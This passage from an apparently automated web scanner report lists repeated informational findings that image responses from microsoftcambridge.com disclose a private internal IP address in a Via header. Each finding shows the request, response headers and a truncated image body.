Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......2........h...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
24.87. http://microsoftcambridge.com/Portals/0/teams/msftonlineserv-header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/msftonlineserv-header.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/msftonlineserv-header.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftOnlineServices/tabid/175/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Tue, 30 Mar 2010 20:12:11 GMT
Content-Length: 33147
Date: Sat, 26 Mar 2011 01:43:45 GMT
X-Varnish: 1939120334
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   ...............................................................................................X..
...[SNIP]...
24.88. http://microsoftcambridge.com/Portals/0/teams/msfuselabs.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/msfuselabs.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/msfuselabs.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 16 Apr 2010 20:46:56 GMT
Content-Length: 4291
Date: Sat, 26 Mar 2011 01:42:15 GMT
X-Varnish: 1939093170
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......2........h....tEXtSoftware.Adobe ImageReadyq.e<...eIDATx..]    .....gvg.@.......hP<.y".O0.A4.A.Cb.......1.....+A..Q....E..^.. "*..X...=f&.u....=..3Kv......Q...]_.W.D...hhhhd.Q....
...[SNIP]...
24.89. http://microsoftcambridge.com/Portals/0/teams/mtechcomp.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/mtechcomp.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/mtechcomp.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 12 Mar 2010 19:47:10 GMT
Content-Length: 1755
Date: Sat, 26 Mar 2011 01:42:16 GMT
X-Varnish: 1939093447
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......2........h....tEXtSoftware.Adobe ImageReadyq.e<...}IDATx....u.H..W......
.. ..p..W....
t.@r....T ...*@.@....d....,....}...vg.og....p0..0........................................
...[SNIP]...
24.90. http://microsoftcambridge.com/Portals/0/teams/officecom.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/officecom.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/officecom.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Tue, 14 Apr 2009 21:39:33 GMT
Content-Length: 4556
Date: Sat, 26 Mar 2011 01:42:16 GMT
X-Varnish: 1939093453
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......2........h....tEXtSoftware.Adobe ImageReadyq.e<...nIDATx..]ml..y~w....K..H..W5-+.e..&..<6@.4@E"(\ .yL.?E..h.....@?...I?..1...$-...ZXE."\FA[4Ey...Q$...R(3.JG.>w.3...h.{...%.....
...[SNIP]...
24.91. http://microsoftcambridge.com/Portals/0/teams/our_teams.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/our_teams.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/our_teams.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 24 Aug 2009 13:44:15 GMT
Content-Length: 4169
Date: Sat, 26 Mar 2011 01:42:15 GMT
X-Varnish: 1939093157
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...,...%........    ....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.92. http://microsoftcambridge.com/Portals/0/teams/research_header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/research_header.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/research_header.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:32:50 GMT
Content-Length: 27598
Date: Sat, 26 Mar 2011 01:43:57 GMT
X-Varnish: 1939123619
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......G......Adobe.d......................................
......

.....
.............................

...............................................................X..
...[SNIP]...
24.93. http://microsoftcambridge.com/Portals/0/teams/research_inline.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/research_inline.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/research_inline.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:32:52 GMT
Content-Length: 5798
Date: Sat, 26 Mar 2011 01:43:57 GMT
X-Varnish: 1939123635
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky..............Adobe.d..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@...........
...[SNIP]...
24.94. http://microsoftcambridge.com/Portals/0/teams/sharepoint.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/sharepoint.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/sharepoint.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Tue, 29 Jun 2010 14:24:40 GMT
Content-Length: 4269
Date: Sat, 26 Mar 2011 01:42:16 GMT
X-Varnish: 1939093368
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......2........h....tEXtSoftware.Adobe ImageReadyq.e<...OIDATx...    tV...'!iX...(..jU..TE..Q......J.u.Z.Z.......i......Q*bY\.".,**....    |.9.oN..y_.@.@.......y......{.3/..R).P(..@...B.
...[SNIP]...
24.95. http://microsoftcambridge.com/Portals/0/teams/sharepoint_img.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/sharepoint_img.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/sharepoint_img.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 28 Jun 2010 17:33:11 GMT
Content-Length: 20695
Date: Sat, 26 Mar 2011 01:42:14 GMT
X-Varnish: 1939092826
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...X...^.....p.......tEXtSoftware.Adobe ImageReadyq.e<..PyIDATx..]...5...-W. ....*`...QPlX.w....b..bCTD.......(.R.Tz.8z=...3..$.a.v.yg...p..ff2)...I.7Z.N...........*......3L.......PPP
...[SNIP]...
24.96. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/sharepoint_inline.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/sharepoint_inline.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 28 Jun 2010 17:34:13 GMT
Content-Length: 19715
Date: Sat, 26 Mar 2011 01:42:14 GMT
X-Varnish: 1939092830
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
24.97. http://microsoftcambridge.com/Portals/0/teams/sharepoint_workspace_title.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/sharepoint_workspace_title.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/sharepoint_workspace_title.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 28 Jun 2010 15:44:19 GMT
Content-Length: 4247
Date: Sat, 26 Mar 2011 01:42:13 GMT
X-Varnish: 1939092660
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR..............!......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.98. http://microsoftcambridge.com/Portals/0/teams/sspalding_feat.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/sspalding_feat.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/sspalding_feat.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/FuseLabs/tabid/82/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Mon, 31 Jan 2011 21:06:39 GMT
Content-Length: 16975
Date: Sat, 26 Mar 2011 01:44:00 GMT
X-Varnish: 1939124649
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......Exif..II*.................Ducky.......F.....thttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
24.99. http://microsoftcambridge.com/Portals/0/teams/startuplabs_inline.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/startuplabs_inline.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/startuplabs_inline.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/FuseLabs/tabid/82/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:33:02 GMT
Content-Length: 25377
Date: Sat, 26 Mar 2011 01:44:00 GMT
X-Varnish: 1939124638
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......G....
.http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c036 46.27
...[SNIP]...
24.100. http://microsoftcambridge.com/Portals/0/teams/teamlogo_MNOIL.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/teamlogo_MNOIL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/teamlogo_MNOIL.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 12 Mar 2010 19:47:31 GMT
Content-Length: 1746
Date: Sat, 26 Mar 2011 01:42:17 GMT
X-Varnish: 1939093637
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......2........h....tEXtSoftware.Adobe ImageReadyq.e<...tIDATx......J...S7.N..!pC`CpC....0..AB..0.AB.JU.......>..j.v......i.gQ.....9X@`.......... 0................3.r-.SKv..s    .8..J..
...[SNIP]...
24.101. http://microsoftcambridge.com/Portals/0/teams/teamlogo_msftonlineserv.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/teamlogo_msftonlineserv.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/teamlogo_msftonlineserv.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Tue, 30 Mar 2010 20:12:34 GMT
Content-Length: 7518
Date: Sat, 26 Mar 2011 01:42:16 GMT
X-Varnish: 1939093454
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......2........h....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..\.T...>3.. E.#HS@l...
b........yQ..1F....$.X..&V..$`...
J... .
...3s..3.>..[........^k.....g.}.....9.H.V3.\.p.g........
...[SNIP]...
24.102. http://microsoftcambridge.com/Portals/0/teams/teams_header.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/teams_header.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/teams_header.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:33:04 GMT
Content-Length: 4596
Date: Sat, 26 Mar 2011 01:42:12 GMT
X-Varnish: 1939092472
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......!......`......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.103. http://microsoftcambridge.com/Portals/0/teams/teamsh2_MNIOL.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/teamsh2_MNIOL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/teamsh2_MNIOL.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftNovellInteroperability/tabid/342/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 12 Mar 2010 18:54:08 GMT
Content-Length: 1890
Date: Sat, 26 Mar 2011 01:43:40 GMT
X-Varnish: 1939118516
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................f....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..].m.:.V..........3..............y.x.C=B=....s/.$.a)..E.I...$.B.#)........e..z].Ww.^.....]...q.r.zE.....]...r.y}.......
...[SNIP]...
24.104. http://microsoftcambridge.com/Portals/0/teams/teamsh2_msftonlineserv.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/teamsh2_msftonlineserv.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/teamsh2_msftonlineserv.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftOnlineServices/tabid/175/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
